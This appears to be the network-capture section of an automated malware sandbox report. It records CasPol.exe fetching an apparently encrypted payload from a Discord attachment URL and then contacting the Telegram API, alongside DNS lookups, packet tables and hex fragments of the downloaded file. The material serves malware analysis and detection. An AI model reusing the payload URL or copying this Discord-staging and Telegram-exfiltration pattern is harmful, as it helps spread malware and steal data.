Aug 23, 2022 13:21:50.249290943 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.249413013 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.249504089 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.249608040 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.249646902 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.249658108 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.249778986 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.249825001 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.249943972 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.250101089 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.250207901 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.250242949 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.250255108 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.250328064 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.250408888 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.250555038 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.250689983 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.250807047 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.250879049 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.250909090 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.250983953 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251004934 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251080990 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251172066 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.251302004 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251351118 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.251373053 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251398087 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.251481056 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251642942 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251672983 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.251699924 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.251807928 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251960993 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.251979113 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.252017021 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.252113104 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.252284050 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.260896921 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.261117935 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.261394978 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.261610985 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.261656046 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.261691093 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.261831999 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.261885881 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.262139082 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.262382984 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.262526035 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.262624025 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.262748003 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.262893915 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.262978077 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.262990952 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.263024092 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.263194084 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.263345003 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.263535023 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.263560057 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.263588905 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.263674021 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.263775110 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.263926983 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.264075041 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.264190912 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.264328003 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.264523029 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.264715910 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.264867067 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.264893055 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.264966965 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.265126944 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.265279055 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.265292883 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.265311956 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.265346050 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.265495062 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.265616894 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.265819073 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.265855074 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.265990973 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.266069889 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.266143084 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.266179085 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.266277075 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.266366959 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.266418934 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.266618967 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.266774893 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.266932011 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.266967058 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.267014980 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.267051935 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.267159939 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.267199039 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.267226934 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.267313957 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.267348051 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.267357111 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.267518997 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:22:01.799559116 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.799643040 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.799909115 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.806750059 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.806817055 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.872958899 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.873281956 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.874797106 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.874826908 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.875283957 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.878667116 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.898585081 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.899209023 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.942646980 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.970900059 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.971141100 CEST	443	49778	149.154.167.220	192.168.11.20
Aug 23, 2022 13:22:01.971349001 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:22:01.974244118 CEST	49778	443	192.168.11.20	149.154.167.220
Aug 23, 2022 13:23:39.667752981 CEST	49776	80	192.168.11.20	162.159.130.233
Aug 23, 2022 13:23:39.677021980 CEST	80	49776	162.159.130.233	192.168.11.20
Aug 23, 2022 13:23:39.677319050 CEST	49776	80	192.168.11.20	162.159.130.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 13:21:49.721051931 CEST	49160	53	192.168.11.20	1.1.1.1
Aug 23, 2022 13:21:49.730309963 CEST	53	49160	1.1.1.1	192.168.11.20
Aug 23, 2022 13:22:01.782185078 CEST	64403	53	192.168.11.20	1.1.1.1
Aug 23, 2022 13:22:01.791558027 CEST	53	64403	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 23, 2022 13:21:49.721051931 CEST	192.168.11.20	1.1.1.1	0x744d	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 23, 2022 13:22:01.782185078 CEST	192.168.11.20	1.1.1.1	0xfa3f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 23, 2022 13:21:49.730309963 CEST	1.1.1.1	192.168.11.20	0x744d	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Aug 23, 2022 13:21:49.730309963 CEST	1.1.1.1	192.168.11.20	0x744d	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Aug 23, 2022 13:21:49.730309963 CEST	1.1.1.1	192.168.11.20	0x744d	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Aug 23, 2022 13:21:49.730309963 CEST	1.1.1.1	192.168.11.20	0x744d	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Aug 23, 2022 13:21:49.730309963 CEST	1.1.1.1	192.168.11.20	0x744d	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Aug 23, 2022 13:22:01.791558027 CEST	1.1.1.1	192.168.11.20	0xfa3f	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

api.telegram.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49777	162.159.130.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49778	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49776	162.159.130.233	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2022 13:21:49.747915983 CEST	7865	OUT	GET /attachments/956928735397965906/1011525020427763732/KqRRf17.jpb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache
Aug 23, 2022 13:21:49.763501883 CEST	7866	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Aug 2022 11:21:49 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 23 Aug 2022 12:21:49 GMT Location: https://cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5pbfOCPacNm%2B%2BlpVYGQ8%2FeZviiOWrAedTLMLpfxAR08ZScRMS5BOY9qPJbOOGMWze3H5eaBw7h02XfWbfst%2BjebV0nR45Ri3o23GU%2BtawDhCUHNHvXZyBB3ljjfMa5eYOB9j1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 73f37785fc1e9b82-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49777	162.159.130.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-23 11:21:49 UTC	0	OUT	GET /attachments/956928735397965906/1011525020427763732/KqRRf17.jpb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: cdn.discordapp.com Connection: Keep-Alive
2022-08-23 11:21:50 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 23 Aug 2022 11:21:50 GMT Content-Type: application/octet-stream Content-Length: 215104 Connection: close CF-Ray: 73f37788adc16945-FRA Accept-Ranges: bytes Age: 11404 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=KqRRf17.jpb, attachment ETag: "8ff4deeb1bd2d844e6dbd4e81156c37b" Expires: Wed, 23 Aug 2023 11:21:50 GMT Last-Modified: Tue, 23 Aug 2022 06:39:18 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1661236758151775 x-goog-hash: crc32c=UYBcgA== x-goog-hash: md5=j/Te6xvS2ETm29ToEVbDew== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 215104 X-GUploader-UploadID: ADPycdtGJqHDeUF50bJHdvvdn0fljHMJVYb49xeKPniXpT9rWV7pVaDZs0Ekk6SaSD_MP-nni6BmuLJUbF1140KMiq27qpCFd3dY X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W54%2BO3RS5ZotsnoxESF41r64ATuhFQJHfF9rUKYAEsNx4yLFHw1EOkMnkrKOU3IMJqtuRBlYveMhwnC0IE46DkFvRMaShX2RGkbSaY%2BWssqm3naNp6ldc38rxmA26Q8BczBdTg%3D%3D"}],"group":"cf-nel","max_age":604800}
2022-08-23 11:21:50 UTC	1	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2022-08-23 11:21:50 UTC	1	IN	Data Raw: af b3 f8 f3 c4 18 a7 64 a8 41 e5 ae d0 18 15 49 69 62 5d 50 76 08 0f 7b 3d 53 71 52 02 fb 64 b0 b8 ec a5 01 21 bf 20 2a 0a 6d 6a 37 dc b1 c6 b8 aa 8b 02 1f 17 30 78 22 46 25 fc 91 02 55 df 7b 76 bc 28 0a 96 64 7b 85 b8 6b da 0c f0 49 d1 cd 41 fd 14 a0 40 bf 96 e2 14 5f e8 c2 b0 54 d8 a9 91 db 03 90 27 3b ee e0 8b 67 00 02 a3 52 c4 0f b2 82 14 75 89 70 34 87 99 89 7a 34 97 9c bc a7 1e 53 8b 57 f4 f8 a5 cb 5b 69 b9 21 02 e3 f6 9b 39 e7 11 8c ba a0 11 b8 7b 26 0e a5 d0 4c e6 d2 5d fd b7 82 47 6d 50 4a dd 5d 25 f7 6d e6 1e b7 72 8c 00 0c 69 5b ba 78 d9 4d 85 9c a0 d7 c0 45 72 93 54 c0 18 93 26 ba 15 e0 61 3f a8 2b b2 68 ca f9 fe 63 ec f7 59 07 d9 f9 f1 b5 14 15 d7 c0 91 a7 48 8a 5e e7 e6 60 ce b7 d3 48 7c a5 02 53 40 c7 bb 67 2b c2 36 79 cf a0 e7 45 b4 63 d7 Data Ascii: dAIib]Pv{=SqRd! *mj70x"F%U{v(d{kIA@_T';gRup4z4SW[i!9{&L]GmPJ]%mri[xMErT&a?+hcYH^`H\|S@g+6yEc
2022-08-23 11:21:50 UTC	2	IN	Data Raw: af 7f 8b 39 1f 82 47 b3 bd 03 09 17 58 33 e6 bd e1 8b 3c 41 7b 70 a0 88 d3 e5 54 c4 37 43 3c 07 6b 13 61 5a ce 83 e1 c2 ef 8e 94 c5 65 a4 9d 54 76 a0 2b e0 6a f3 cd d4 fa a7 51 85 35 e2 3b 7b bd 79 72 2a 0a aa d3 40 5e b6 72 5c b8 03 14 06 8e 79 c7 59 92 69 d1 29 33 53 03 98 a8 30 09 6d 1d 45 c5 a9 f6 6d 0f e7 34 d9 e5 69 d1 42 1e 5b ab f2 40 a8 c5 0d 59 3f 06 25 99 90 4a d0 e9 62 2e 2c 8b 1c 25 86 65 ff 6b 53 4d 1e 53 4f f2 53 f6 e5 cd 05 7c 4f 28 e7 4c 50 0e 99 df a7 20 42 4c be b6 a4 69 fd cb 24 97 5c 1a ce f5 d4 44 71 2c e5 8e e3 5d e7 8a a9 20 99 b9 b5 d3 a7 b0 51 ad ec 6d 3c e0 72 1c 6f e2 99 90 cf 43 f4 1a ad 63 57 da e0 19 3a 99 6b 7b c1 12 2e e5 af eb 09 96 2d 95 58 94 3e 38 0c be 97 ac b4 b1 2e f5 74 94 9a a4 bf 28 70 bb d5 a2 ae 2a c1 82 20 54 Data Ascii: 9GX3<A{pT7C<kaZeTv+jQ5;{yr@^r\yYi)3S0mEm4iB[@Y?%Jb.,%ekSMSOS\|O(LP BLi$\Dq,] Qm<roCcW:k{.-X>8.t(p T
2022-08-23 11:21:50 UTC	4	IN	Data Raw: 7e 80 77 ef bf 44 f3 0f f3 50 0c ec 91 0f e3 34 25 e7 b5 4f f0 4f 32 9b ba 6b 98 1c cd 53 20 1c 1c 74 aa 58 43 4d 48 da da b3 b6 3f f8 cd 67 3b 77 63 d3 af 02 ee 91 bb 03 1f 30 51 18 d9 f4 5d 9e 83 68 ce bc 47 b0 e5 54 7a fa 5e 14 62 7d 06 30 26 f3 cf 73 94 c5 8f a1 65 1d f1 24 3d 1b ac e6 ce d6 6d 2c c4 0f 9c 05 b8 db 81 da 45 36 1c 91 02 b1 12 3f 1f 40 6a c3 8b df 54 67 88 d4 79 d2 93 b8 b1 89 57 b6 cd ad 96 c4 15 00 25 f4 5a 2c bb 4c 0c 60 ec 2b 4d f0 2c 26 c7 52 6f af 35 f0 76 8e ba 5c d7 7e aa 79 24 07 39 18 0c 3e d4 01 63 4f 9f 8e f3 ec 76 1f f6 57 f0 f2 ac 92 0e 7a 9b fc 07 da 3e 60 96 7c ae df 8f 85 7a 7c 7f 78 f0 35 be 54 ba 9a 3c be 7e a0 91 31 b5 54 ff 25 5e c4 7e dd 6c 1b 93 6d 11 3a 8f 67 ac b7 c4 5e 8b 02 0f f1 20 65 cd f5 4d 8d b3 e1 5e 6b Data Ascii: ~wDP4%OO2kS tXCMH?g;wc0Q]hGTz^b}0&se$=m,E6?@jTgyW%Z,L`+M,&Ro5v\~y$9>cOvWz>`\|z\|x5T<~1T%^~lm:g^ eM^k
2022-08-23 11:21:50 UTC	5	IN	Data Raw: 64 c7 3e 21 b0 04 e9 af bf dc 8f 91 17 e1 90 28 95 64 7d 98 b7 6b dd 14 f1 b7 fd c7 87 ee 14 a0 44 a9 a5 ba 4d 54 e8 c5 ae aa d9 85 84 cf fd 96 04 3b ee e6 f8 33 00 02 a9 21 91 0f b2 88 1e 6a 80 7b 34 80 86 80 84 35 3b 95 ba c8 46 4c 31 53 eb 46 a7 06 7d cb 46 6c e3 c6 89 6c 4b 9f 31 fb d1 31 77 e6 1d 63 0f c6 b1 24 92 b6 29 da c2 19 66 33 27 3c f6 34 4c cc d7 a8 61 b6 61 f0 64 69 43 41 49 73 83 5e 85 9c a4 cf 3e 44 42 a8 47 c0 54 96 3c 44 fd 24 b1 3d 57 d4 4d 74 c1 f9 f9 75 f2 f6 77 04 c5 f3 fa b2 0b 21 2a c1 bd ad 63 8f 66 d8 19 9f ef c1 d0 48 7c 9e 32 5b 40 cd ba 67 2b d6 76 79 de f3 b0 45 b4 6b dd c9 51 20 18 e2 50 4b ce 43 a2 c5 31 74 9a c9 1e 19 9b fa 96 4a 9a be 0f a3 d9 88 71 d3 3f a9 ff 72 ef 4d b4 32 47 b8 b8 86 d6 1c 94 5b 4f fe c5 a0 ec 73 ac Data Ascii: d>!(d}kDMT;3!j{45;FL1SF}FllK11wc$)f3'<4LaadiCAIs^>DBGT<D$=WMtuw!*cfH\|2[@g+vyEkQ PKC1tJq?rM2G[Os
2022-08-23 11:21:50 UTC	6	IN	Data Raw: 3c f1 cd d2 1f a1 51 85 68 9d 3c 7b 03 7d 8c 3f 19 aa d3 42 54 36 7a 5d b8 07 3c fc 5d 79 c1 d9 d7 69 d1 2d 3a d2 09 98 a4 34 1e ed 0b 45 c5 ac e0 ed 03 e7 34 dd f3 e9 ee 43 1e 5f 8f 73 4e a8 c9 09 4f bf 14 25 99 95 47 60 fd 62 5e 2a a3 4b 30 86 63 6e 52 d7 4f 1a 7d 12 83 66 f0 65 d9 16 7a 35 3d 67 5f 54 22 cc e6 5b 5f 52 4a 3e a6 cb 5e f9 dd a2 94 a2 1b b4 f3 54 52 75 3a 1f 99 03 66 d7 9b ab 67 5b b8 b5 d3 36 ae 3e 97 e8 45 c0 f0 74 32 6a f9 99 96 da 6d d7 32 ad 65 d3 e8 66 1b 3e b7 1a 5f c1 14 a4 91 96 eb 0d b8 57 84 58 92 ba 35 0a d1 a5 84 ee b5 31 fa 79 91 9a a4 ba 13 25 a8 db b2 2c 1c a7 82 24 76 e4 24 89 c0 4f fe ce 5f f4 a7 78 99 72 98 de 32 84 45 ac 0b 67 d7 f8 66 1e 71 27 ab 38 7c 00 ff d8 c5 3b f5 ee bf f0 ec cc 91 8d 16 45 c0 1e 05 2c 73 41 09 Data Ascii: <Qh<{}?BT6z]<]yi-:4E4C_sNO%G`b^*K0cnRO}fez5=g_T"[_RJ>^TRu:fg[6>Et2jm2ef>_WX51y%,$v$O_xr2Egfq'8\|;E,sA
2022-08-23 11:21:50 UTC	8	IN	Data Raw: 1e ee 9b c5 47 1f 30 5b 30 bc f6 b9 99 94 07 6f bd 47 ba f9 51 6b ff 6f 75 7d 70 90 2f 2a f3 f2 61 9d d4 9f b7 7d 90 c8 be 28 0d 36 f5 ef ed 7b b0 df 2e e2 13 24 c0 fc 8f 53 aa 0c 93 1e 8f 1a 2c 16 5a 54 ca 98 d6 4f 02 94 c5 70 c6 ea b2 a0 80 42 b8 f3 a7 85 cd 0c 65 a4 68 4b 2f 8c 16 1a fc f7 21 31 a4 3d 23 e5 3c 6a a9 27 c9 21 e3 fc 5a c1 f9 bc 7c 4b 41 2d 0c 12 c8 40 29 4e 45 b7 1d db c2 7c 70 66 89 f0 86 bf fd 95 7e b3 83 0b d2 2c 62 01 7e ae d8 a2 08 7d 7c 7f 18 e3 7f 1f 51 a0 81 14 af 7f a0 9b 47 a4 5d 08 33 dc 88 7e dd 6c b9 82 3d 09 81 8e 62 b1 ae d0 76 db 00 0f e9 37 74 70 f4 41 91 a7 f5 4b 58 13 39 37 95 6f a2 b7 2b 11 b5 49 30 dd a5 f0 8d 22 7f 20 d5 73 88 d3 e2 6f d6 26 44 2c 38 e0 02 66 4b f2 1f f0 d6 c7 9a 08 c9 63 b3 b5 c4 76 a0 30 ee 2d f6 Data Ascii: G0[0oGQkou}p/*a}(6{.$S,ZTOpBehK/!1=#<j'!Z\|KA-@)NE\|pf~,b~}\|QG]3~l=bv7tpAKX97o+I0" so&D,8fKcv0-
2022-08-23 11:21:50 UTC	9	IN	Data Raw: 94 75 fe 03 8f 5f cd 10 bd aa b8 77 89 76 96 98 8a 9a 7e 34 06 98 a3 b4 ee 4d 1d 57 fd 53 bc 1e 52 55 b8 6d c9 60 bd e7 43 90 31 ed cc d0 66 34 1b 67 20 cf ae 2f 9f 95 ad dd d5 e1 c5 00 34 37 f9 34 5a d3 32 57 4c bb 14 ea 7c 17 5a 56 b7 76 5f 51 96 98 a0 c6 c4 5a 2c 28 55 ec 59 9b 3a b1 82 59 88 5d ac 89 ad 67 d9 fd fe 72 08 e8 4d f8 d3 d4 f4 cb 34 2b d4 c4 a8 2a 49 8a 5e f8 f1 73 14 eb c1 4c 63 88 fc 52 6c d0 b2 78 21 ea 72 79 cf 86 88 e9 b4 61 dd 8e a9 21 18 ee 86 5d c0 50 bd ce 27 1f d8 37 1f 3f 8e cb 1e 62 d1 be 1d aa fd c3 73 fb ca a4 f9 5c b2 03 b4 34 65 6d a1 95 d4 06 08 47 50 eb 3a b2 c4 69 a1 1c a2 bf 4e 27 08 c4 6b 1f e8 9b 36 c9 2b 2e 13 6a 63 82 02 2c e5 ad 43 fb 1a 6f 4a 3b 60 5d 74 bb 56 47 b7 58 f2 f1 cf a7 3b fe a2 77 25 89 66 90 e5 0b f5 Data Ascii: u_wv~4MWSRUm`C1f4g /474Z2WL\|ZVv_QZ,(UY:Y]grM4+*I^sLcRlx!rya!]P'7?bs\4emGP:iN'k6+.jc,CoJ;`]tVGX;w%f
2022-08-23 11:21:50 UTC	10	IN	Data Raw: 34 dd f9 c1 ee 42 1e 59 95 dc 4e a8 cf 21 e8 bf 09 2f b1 a0 5c 50 ff 69 29 00 81 49 27 80 0c be 7a 53 47 36 6a 1f d8 71 f2 65 d9 2d 86 4a 31 61 30 1a 0e 9d fd 56 ff 50 62 13 a2 a4 63 d1 6f a6 82 5a 11 e2 cd 54 52 7b f2 e1 9f 49 4a e6 9a ad 08 63 b8 b3 d5 6e e7 51 bf f5 45 c6 e0 69 2a ed fb e7 90 cb 6b 8c 18 ad 74 a9 f2 e0 19 34 ba 1a ca c3 14 a8 8d 6d eb 0d b4 db 9c 37 51 be 24 06 b3 9a eb 2a b3 2e f9 e7 8f b1 8e aa 06 44 7c d5 a4 24 40 ab 82 24 7d 55 31 96 d3 26 9a df 51 e6 f1 d5 9b 72 9a 13 e4 8a 5c a0 c6 be d9 e2 44 3a 64 27 a1 21 7a 03 f4 c9 16 3b f5 e0 ba 71 32 c0 8a 29 2b 4c ca 1e c8 60 7d 5d 7d e2 26 ba c4 f7 8a 90 ed 71 90 31 f5 bd 22 20 66 7b 83 b6 43 f4 0c 0f bc 0f cd ff d7 14 a0 41 a3 96 e2 56 5f f0 c2 8f 03 d8 a5 91 db 03 90 27 3b ee e0 ec 00 Data Ascii: 4BYN!/\Pi)I'zSG6jqe-J1a0VPbcoZTR{IJcnQEikt4m7Q$.D\|$@$}U1&Qr\D:d'!z;q2)+L`}]}&q1" f{CAV_';
